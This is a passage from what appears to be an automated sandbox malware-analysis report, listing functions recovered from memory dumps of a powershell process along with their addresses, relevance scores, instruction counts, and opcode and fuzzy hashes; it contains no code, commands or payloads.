                                                                                                        • Opcode Fuzzy Hash: 58422577e9b42e5b47a45ac2c17f6d829ad4279bee47688d87d7ead16dd6d8aa
                                                                                                        • Instruction Fuzzy Hash: E4D15FB8A00219DFDB25DF64C951B9ABBB2BF85304F118199D9096F781CB32ED81CF91
                                                                                                        Function 071AC524 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3814145804
                                                                                                        • Opcode ID: e37892570b31881b8067e131af18030096195be63608ce6b9b25c0cad7b4221c
                                                                                                        • Instruction ID: 7185fe92e49f8b9ab151ead0ab7f1a139c89f39dea8e1abb122f27f896a082cc
                                                                                                        • Opcode Fuzzy Hash: e37892570b31881b8067e131af18030096195be63608ce6b9b25c0cad7b4221c
                                                                                                        • Instruction Fuzzy Hash: 87A150B8A00219EFDB25CF54C951BAABBB2BB85304F11C198D5096F781CB72ED81CF91
                                                                                                        Function 071AC51E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3814145804
                                                                                                        • Opcode ID: a7423cc6d032bae58f9b4b7f68193243f0fd85359ad9cb39a1eb898d634f2c9e
                                                                                                        • Instruction ID: 9460d89c10fd8d147fb1c1c49a9aa1569a4ddd9e275a07eee5082b77a3f6dad1
                                                                                                        • Opcode Fuzzy Hash: a7423cc6d032bae58f9b4b7f68193243f0fd85359ad9cb39a1eb898d634f2c9e
                                                                                                        • Instruction Fuzzy Hash: 1F814DB8A00219EFDB25DF14C955BAABBB2BB85304F51C1D8D5096B781CB32ED81CF91
                                                                                                        Function 071A8000 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x.k
                                                                                                        • API String ID: 0-3814145804
                                                                                                        • Opcode ID: f42186c86286e0bc238921745588a6bd839b2571dead4ed2ad6ac7f216eda96f
                                                                                                        • Instruction ID: 2a0d432efd68e1b706db425b752f9724247457adb4edee2a372147faca0b8cab
                                                                                                        • Opcode Fuzzy Hash: f42186c86286e0bc238921745588a6bd839b2571dead4ed2ad6ac7f216eda96f
                                                                                                        • Instruction Fuzzy Hash: 9D3182B4B10204AFE7159B64C915BAF7A63AF85314F20C418E9057F7D1CF76AC428B91
                                                                                                        Function 08C71120 Relevance: .4, Instructions: 433COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 90f517167e11ab9721ca665e07264de481a17c51841bc3f6a77222eb9851bed5
                                                                                                        • Instruction ID: 098bbefbdd3e399cbf9075157b3c79fc41a2851b007365123e130651ca611a79
                                                                                                        • Opcode Fuzzy Hash: 90f517167e11ab9721ca665e07264de481a17c51841bc3f6a77222eb9851bed5
                                                                                                        • Instruction Fuzzy Hash: B5021C74A01209DFDB15CF98D984A9DBBF2FF88311F28815AE815AB365D731ED42CB90
                                                                                                        Function 08C720C0 Relevance: .4, Instructions: 421COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b5de674450ee9bb61a65f06e7cb43a0e97b236bf77313409853a51d70ff7217a
                                                                                                        • Instruction ID: fa679ecc0cf655a480b00f2cbbd2846c87483bdb9a848deced30579d3909ae11
                                                                                                        • Opcode Fuzzy Hash: b5de674450ee9bb61a65f06e7cb43a0e97b236bf77313409853a51d70ff7217a
                                                                                                        • Instruction Fuzzy Hash: 6B022D34E01209DFDB15CFA8D994AADBBB2FF88311F248159E815AB365C731ED42CB90
                                                                                                        Function 071A72A4 Relevance: .4, Instructions: 386COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 816fa70c627dbb10a516be06218b355ac1ebccafef6d9ba153f4493811b9cd02
                                                                                                        • Instruction ID: 495539ed68af1b00b4b744e490c1d14bfdf41e8248de566f577527a739a0840f
                                                                                                        • Opcode Fuzzy Hash: 816fa70c627dbb10a516be06218b355ac1ebccafef6d9ba153f4493811b9cd02
                                                                                                        • Instruction Fuzzy Hash: 79F16BB8B10200EFDB15CB98D595EA9BBB2AF84304F25C159E905AF3D1C772ED42CB51
                                                                                                        Function 071A4548 Relevance: .4, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b24514e37432dbc288734b031ceef7d5cff35a11105e2cd56bc6594010bd686
                                                                                                        • Instruction ID: 5e7f0a43ce5391d76082e01891c571de97babf0b6fa0d1ff2601a083fba95158
                                                                                                        • Opcode Fuzzy Hash: 8b24514e37432dbc288734b031ceef7d5cff35a11105e2cd56bc6594010bd686
                                                                                                        • Instruction Fuzzy Hash: 45E19EB4B01245AFEB15CB98C450F5ABBB2AF89305F14C059ED05AF391CBB2EC42CB51
                                                                                                        Function 071A72B8 Relevance: .4, Instructions: 379COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 98f7c71c0dbf6c04e8440b0b2b9c9d7063fb70fa0b9a0c279f8301069d4dc2cb
                                                                                                        • Instruction ID: 4e2f21f37060a914286f1c1357783b477fc9ae3970ce2ecde6c1b9ae2cccf5fc
                                                                                                        • Opcode Fuzzy Hash: 98f7c71c0dbf6c04e8440b0b2b9c9d7063fb70fa0b9a0c279f8301069d4dc2cb
                                                                                                        • Instruction Fuzzy Hash: 9BF16AB8B10200EFDB15CB98D595EA9BBB2BF84304F25C159E905AF391C772ED42CB91
                                                                                                        Function 08C70800 Relevance: .3, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2722861bae01552f6547e4abf18b4bdd6643a380ae902b87a5e130e8822d5bf6
                                                                                                        • Instruction ID: 882eed9461fb19fea601939817fc759e155deaa65eb0b124634bec1d51aaff90
                                                                                                        • Opcode Fuzzy Hash: 2722861bae01552f6547e4abf18b4bdd6643a380ae902b87a5e130e8822d5bf6
                                                                                                        • Instruction Fuzzy Hash: 9CE11834A00609DFDB15CF98D484AADFBB2FF88321F248159E805AB365C771ED82CB90
                                                                                                        Function 071A452C Relevance: .3, Instructions: 343COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 469c0b436c6c2874a2882ffd6475c37a72478c469089a70aab85d2983366337e
                                                                                                        • Instruction ID: a6a24f8de0dfe6614452a585c46dfe84d6413db052856f037df9102fc000b72a
                                                                                                        • Opcode Fuzzy Hash: 469c0b436c6c2874a2882ffd6475c37a72478c469089a70aab85d2983366337e
                                                                                                        • Instruction Fuzzy Hash: 2FE16BB8A01245AFDB15CB98C550F9ABBB2AF89314F25C059ED05AF391C7B2EC42CB51
                                                                                                        Function 02C872A0 Relevance: .3, Instructions: 317COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: efaa7a74bad15d3d8ab00793f8ae5fbf602c511d56fa0d5fdf522cfae8cc2cf0
                                                                                                        • Instruction ID: e3aa9fdbf4d7b41bfe711799d98fc3f9d0a4f5fb6a8791ba8c107b2d87a5a02a
                                                                                                        • Opcode Fuzzy Hash: efaa7a74bad15d3d8ab00793f8ae5fbf602c511d56fa0d5fdf522cfae8cc2cf0
                                                                                                        • Instruction Fuzzy Hash: 26C19039A00248DFCB15EFA5D544AADBBF2FF84318F218559E406AB364DB34ED49CB80
                                                                                                        Function 08C70448 Relevance: .2, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c9a5f9056404ed80da00afe424f30b6bb21f17ab943e4cadd4c7738c35c3c01
                                                                                                        • Instruction ID: 22f47ac015a47d0df7e4037f3ea3cd5ca132fd489ae7675bce5eddf9390f8b43
                                                                                                        • Opcode Fuzzy Hash: 7c9a5f9056404ed80da00afe424f30b6bb21f17ab943e4cadd4c7738c35c3c01
                                                                                                        • Instruction Fuzzy Hash: 0981A034B006098FCB15DBA9D854AAEBBF6FFC8301F148469E8059B355DB34ED06CBA1
                                                                                                        Function 02C87A68 Relevance: .2, Instructions: 196COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eb42b7ab6158b6544818c5fdb24fc9a64674743c94f1a45fc7e8ded081e85fa1
                                                                                                        • Instruction ID: d838515e04142cf727d763f8787a55253ed6466149076e557e386bbaa3ec5b5a
                                                                                                        • Opcode Fuzzy Hash: eb42b7ab6158b6544818c5fdb24fc9a64674743c94f1a45fc7e8ded081e85fa1
                                                                                                        • Instruction Fuzzy Hash: 1E71A031A002488FDB14DFA8C884AADFBF6BF85314F24C56AD405DB751EB70AD4ACB90
                                                                                                        Function 02C87BD6 Relevance: .2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fbb8f276ff1bf720cad6664ba3eb8ff313335ef57f9a7d751a243fd2a8adb5bc
                                                                                                        • Instruction ID: 18b49637937dc92e085c01804e8cdc88603c93c6fc1be444a83f1cb82c3f41be
                                                                                                        • Opcode Fuzzy Hash: fbb8f276ff1bf720cad6664ba3eb8ff313335ef57f9a7d751a243fd2a8adb5bc
                                                                                                        • Instruction Fuzzy Hash: A2715F74A002489FDB14EFA5D554BADFBF2BF88308F24C429D411AB7A0DB74AD4ACB50
                                                                                                        Function 08C716E8 Relevance: .1, Instructions: 130COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b4c547e14cd7e45da9f2c376b476103db6d5115a05fd59363dbd2ccbb83283d
                                                                                                        • Instruction ID: 8826e7c6325442894bd99f2dc2ad028c2f8b3901336546023b485e66d467c69d
                                                                                                        • Opcode Fuzzy Hash: 8b4c547e14cd7e45da9f2c376b476103db6d5115a05fd59363dbd2ccbb83283d
                                                                                                        • Instruction Fuzzy Hash: 20514C74E006499FCB15CF58C880AAEBBF1FF49310B298259E855AB3A1D735EC42CB94
                                                                                                        Function 02C87A53 Relevance: .1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37b27bc76ec70f151da7c5f1b32cbf88a60b2bf9c67279a20939581937fe56d9
                                                                                                        • Instruction ID: 1045b6b3f46fcf690ffbdc18b5214cf2655e2295ca685c9fb08ed9a46a370a77
                                                                                                        • Opcode Fuzzy Hash: 37b27bc76ec70f151da7c5f1b32cbf88a60b2bf9c67279a20939581937fe56d9
                                                                                                        • Instruction Fuzzy Hash: 16417170A002588FDB24DFA5C854BEDFBB2BF85354F14C469D005AB751EBB0AD49CB90
                                                                                                        Function 02C8D680 Relevance: .1, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 074976bbf2a0da37b25ca37839454ceea743534647f66a081c373266510842b3
                                                                                                        • Instruction ID: 6847cbecb9232747b6ad63ed05126cc0129f91446b64a25bf1e15743f549f730
                                                                                                        • Opcode Fuzzy Hash: 074976bbf2a0da37b25ca37839454ceea743534647f66a081c373266510842b3
                                                                                                        • Instruction Fuzzy Hash: D7414230A002048FDB15EB75C4557AEBAF7AFC8311F18C469D806AB795DF719C428BA0
                                                                                                        Function 08C70B07 Relevance: .1, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e91952f612bbbae8f9598530db5aba32a89d5661c6dfac77eba5d2539f19235d
                                                                                                        • Instruction ID: a3a3c133b0f9bf12dc3d5bda1f1752aa60aef7220c2d3bb3593d3cd6b37e5b08
                                                                                                        • Opcode Fuzzy Hash: e91952f612bbbae8f9598530db5aba32a89d5661c6dfac77eba5d2539f19235d
                                                                                                        • Instruction Fuzzy Hash: A551C834A00209DFDB15CFA8D584A9DBBB2FF88315F288559E405AB365C775AD82CF90
                                                                                                        Function 08C720B2 Relevance: .1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d06c9f7185babcd7313d996ee23830de1d4393eab8f7acac2aff9ca1572d4424
                                                                                                        • Instruction ID: 257845f8719efed7a9c65501ded7a5a4366640a6af5c177d1a22f412e56048e1
                                                                                                        • Opcode Fuzzy Hash: d06c9f7185babcd7313d996ee23830de1d4393eab8f7acac2aff9ca1572d4424
                                                                                                        • Instruction Fuzzy Hash: F3413F74A006099FCB15CF98C990AAEB7F1FF4C320B258259E925A73A4C735EC52CF50
                                                                                                        Function 08C71111 Relevance: .1, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8d4ac8c6f2912a8d8d2edfd4266946a35aa4387351f7a5a0dd0751dcfe8bfce
                                                                                                        • Instruction ID: 2e3bc061be7daadde547ff69e1f9b0feda4313f7c245d9b2a05095d3a9af9edf
                                                                                                        • Opcode Fuzzy Hash: c8d4ac8c6f2912a8d8d2edfd4266946a35aa4387351f7a5a0dd0751dcfe8bfce
                                                                                                        • Instruction Fuzzy Hash: E5412974A016098FCB15CF9CC984AAEB7F2FF49320B288259E815EB355D335ED42CB94
                                                                                                        Function 08C716D7 Relevance: .1, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84a989506ac9bc01951730c58a5da8c16f8cea1e98b09f123cdb41f226b00ae1
                                                                                                        • Instruction ID: 80c1319f8f5710cbb430fe0fd0241a14787942eddabbd524bf236ade82ee59fe
                                                                                                        • Opcode Fuzzy Hash: 84a989506ac9bc01951730c58a5da8c16f8cea1e98b09f123cdb41f226b00ae1
                                                                                                        • Instruction Fuzzy Hash: 33411D74E006059FCB15CF9CC8849AEB7F1FF48321B698259E825A7364D335ED52CB94
                                                                                                        Function 02C82BB0 Relevance: .1, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f0036f8a7008118eef9e53b716fa895feab4b89bef76bb610635987c31e69d2b
                                                                                                        • Instruction ID: fca1df20942159eda75d57b1c528c1b89e1f0fe27849e9043a74bf8ac44178c4
                                                                                                        • Opcode Fuzzy Hash: f0036f8a7008118eef9e53b716fa895feab4b89bef76bb610635987c31e69d2b
                                                                                                        • Instruction Fuzzy Hash: 99418A74A006058FDB15CF58C498EBAFBB1FF88318B15825AD911AB360C736FD91CBA1
                                                                                                        Function 071A8664 Relevance: .1, Instructions: 98COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 62625ab7c1ba2000f440ac9590d7b2a9d2fc11d21fae775d14b884e7b22ffe46
                                                                                                        • Instruction ID: 69a98b066b92d2ab88aee2f3df40d1f19125a6f398d95c66c766f07613d1a234
                                                                                                        • Opcode Fuzzy Hash: 62625ab7c1ba2000f440ac9590d7b2a9d2fc11d21fae775d14b884e7b22ffe46
                                                                                                        • Instruction Fuzzy Hash: E9319DFD710202AFEB1B4A7595117B6BFA29FC1211F18847AD606DB3C1DB31D881C3A1
                                                                                                        Function 08C707F0 Relevance: .1, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2070436962.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_8c70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0658532a4580f126b1e88086c028aff11978d97576a53b4869e8e2df86089f0
                                                                                                        • Instruction ID: 3b6fda39a19c80eace27a79c21b9a9637a3a94d1a4fd30c7c720ec04335307ea
                                                                                                        • Opcode Fuzzy Hash: b0658532a4580f126b1e88086c028aff11978d97576a53b4869e8e2df86089f0
                                                                                                        • Instruction Fuzzy Hash: 6E310774E00609DFDB14CF99C594AAAF7F2FF88310B248259E959AB751C731ED82CB90
                                                                                                        Function 02C8A980 Relevance: .1, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6c7fbca2e79e3388c74b29a2f735619b41e91aa43114e57054c9a184091d7b7c
                                                                                                        • Instruction ID: 86c2c52b12aa292a271c47cf2e18371a16fd0bc75b78d6dbf955d2f8de6e902e
                                                                                                        • Opcode Fuzzy Hash: 6c7fbca2e79e3388c74b29a2f735619b41e91aa43114e57054c9a184091d7b7c
                                                                                                        • Instruction Fuzzy Hash: F3317E70A083598FCB01DF68D890AAABBB0FF4A314F158097E845EB352D735EC45CBA1
                                                                                                        Function 02C8A93A Relevance: .1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 91cede5a4164e37a49cc51039ae7bc5e09525cf8a04041e95fd25240b4fb193a
                                                                                                        • Instruction ID: 500d5122b8c6abfada53db1d8b88e20041c65ad39143da2dbb4fb2a53d5d113e
                                                                                                        • Opcode Fuzzy Hash: 91cede5a4164e37a49cc51039ae7bc5e09525cf8a04041e95fd25240b4fb193a
                                                                                                        • Instruction Fuzzy Hash: 6C217175A093898FCB02DB58D890A99BBB0FF4A310B198197D855EB392C335ED45CBA1
                                                                                                        Function 071A218D Relevance: .1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2065133698.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_71a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e95ff6bbac32360d6be327cb197fa38b395d1425e66e4181fc61662fc9d8aec
                                                                                                        • Instruction ID: 4c25523ab16a86e306b077251e57e94552c67dfc7038cfbc08b8155e497b5d3c
                                                                                                        • Opcode Fuzzy Hash: 4e95ff6bbac32360d6be327cb197fa38b395d1425e66e4181fc61662fc9d8aec
                                                                                                        • Instruction Fuzzy Hash: 33014EB2E002165BD7265A781C1166E7722AFC1224F1505BBCE015F3C3EB325D1283D6
                                                                                                        Function 02C8FF20 Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b115cf8f74fa010c5c6ac030778e911b5fda31b727ab383dba908714e1c96fa
                                                                                                        • Instruction ID: ef77b35d09cdf1c94eba7de7d6065eb456f67ecacd946ecbcf9cfb5445a924be
                                                                                                        • Opcode Fuzzy Hash: 0b115cf8f74fa010c5c6ac030778e911b5fda31b727ab383dba908714e1c96fa
                                                                                                        • Instruction Fuzzy Hash: F31164B1C003098FDB20DFAAC8457AEBBF5AF89324F14842ED459A7640CB359A41CFA0
                                                                                                        Function 02C8FF28 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2059470322.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_2c80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 04aa20bf066263463da8bdccaa9cc9bf0d76202ab4fbccb10be16adc69e9194a
                                                                                                        • Instruction ID: 6889999111c97a22bd31eb0ace90c822c0328ab388563c5029a2f3fd23318a3e
                                                                                                        • Opcode Fuzzy Hash: 04aa20bf066263463da8bdccaa9cc9bf0d76202ab4fbccb10be16adc69e9194a
                                                                                                        • Instruction Fuzzy Hash: 1A114671D003088FDB20EFAAC445BAEFBF5AB89324F148429D415A7240CB35A940CBA4
                                                                                                        Function 08C70C14 Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
